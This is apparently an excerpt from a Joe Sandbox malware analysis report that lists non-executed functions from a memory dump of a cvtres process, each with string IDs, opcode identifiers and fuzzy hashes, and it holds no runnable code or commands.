                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 747be74d65bd037345119910e1046f4de1868f3228853b7e80b64bc4e4a3b6a5
                                                          • Instruction ID: 1475812fabc05d74b0a5cc781660935c2d65464dab8e849975cdbd44108555fb
                                                          • Opcode Fuzzy Hash: 747be74d65bd037345119910e1046f4de1868f3228853b7e80b64bc4e4a3b6a5
                                                          • Instruction Fuzzy Hash: 60E065B1A24248ABEF50EF70CA057AAB7ADDB42204F2288A9D844CF512E136CA019790

                                                          Non-executed Functions

                                                          Function 06A57688 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-539408830
                                                          • Opcode ID: 6fe825bc6457cd37a0090b0ddf63606a0ba631db2674199f591e5a77730c92a7
                                                          • Instruction ID: 490beda0663c3d1eb5185837e7eed92ea9c35874f406783c9d884693bd9c8089
                                                          • Opcode Fuzzy Hash: 6fe825bc6457cd37a0090b0ddf63606a0ba631db2674199f591e5a77730c92a7
                                                          • Instruction Fuzzy Hash: EF122D70E00219CFDB54EF69D994A9EB7B2BF88304F218569D80AAB355DB34DD85CF80
                                                          Function 06A5A920 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-3377385791
                                                          • Opcode ID: ea3742b4b53f32e8399b83d6fc6bca2f875b0a788ceb4484a2194813e536367c
                                                          • Instruction ID: 3da73da77630805c0e406cf5b7009c8b6c3de6d1490b718404f7dc71d500acb9
                                                          • Opcode Fuzzy Hash: ea3742b4b53f32e8399b83d6fc6bca2f875b0a788ceb4484a2194813e536367c
                                                          • Instruction Fuzzy Hash: D4918170B10209DFEB64EFA5D5447AE77F2FF84301F118629E906AB295DB789C41CB80
                                                          Function 06A57088 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .5{q$$cq$$cq$$cq$$cq$$cq$$cq
                                                          • API String ID: 0-986819311
                                                          • Opcode ID: b132d78036863d91a4237fee06d09df1cad3113b1411f0144859e29e055aadd1
                                                          • Instruction ID: 4c16223dbdb0cf403c2800c12f4d449a4657fcbe8f923a3a53458ff1d545d445
                                                          • Opcode Fuzzy Hash: b132d78036863d91a4237fee06d09df1cad3113b1411f0144859e29e055aadd1
                                                          • Instruction Fuzzy Hash: CDF13C70A00205CFDB59EF68D554A6EB7B2FF84305F258569D805AB398DB79EC42CB80
                                                          Function 06A583C0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq
                                                          • API String ID: 0-2876200767
                                                          • Opcode ID: 24c89b2d79f775ea774cfab7b30d138c36b9bbc9480ce93fb9d14c7669d22ed5
                                                          • Instruction ID: 950e7a997c43524987d3e4ec019bb577683b1c609e9423f15d3ef00bdd598942
                                                          • Opcode Fuzzy Hash: 24c89b2d79f775ea774cfab7b30d138c36b9bbc9480ce93fb9d14c7669d22ed5
                                                          • Instruction Fuzzy Hash: 62B12D70B102298FDB54EF68D5906AEB7B6FF84305F258869D8069B354DB79DC82CB80
                                                          Function 06A587D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LRcq$LRcq$$cq$$cq
                                                          • API String ID: 0-2876661331
                                                          • Opcode ID: 4c5227b1555aa22cb8f54e8b8c2e584b378cab4f031032397069e9e4a9327ea1
                                                          • Instruction ID: efd0b00fb5370f5d40a122e9c8f4b4921c41d058cbb15059a55cc2185179fd4a
                                                          • Opcode Fuzzy Hash: 4c5227b1555aa22cb8f54e8b8c2e584b378cab4f031032397069e9e4a9327ea1
                                                          • Instruction Fuzzy Hash: 1E51A071B002119FDB58EF29D940A6A77F2FF84340F158968E8069F3A5DB39EC44CB81
                                                          Function 06A5ACAE Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.4153635136.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6a50000_cvtres.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $cq$$cq$$cq$$cq
                                                          • API String ID: 0-2876200767
                                                          • Opcode ID: a225ecfb5520d0dc8256c372530fc5fe184dde7cef7a8bc5ef971fec7414b4d1
                                                          • Instruction ID: 62392b3695e7febaa0c6d36b57b77155d71986f381b90ade8be4c862df6d8fb8
                                                          • Opcode Fuzzy Hash: a225ecfb5520d0dc8256c372530fc5fe184dde7cef7a8bc5ef971fec7414b4d1
                                                          • Instruction Fuzzy Hash: FB518E30B102159FDF65FB68D5806AEB3F2EF89211F118629ED06AB254DB34EC42CB90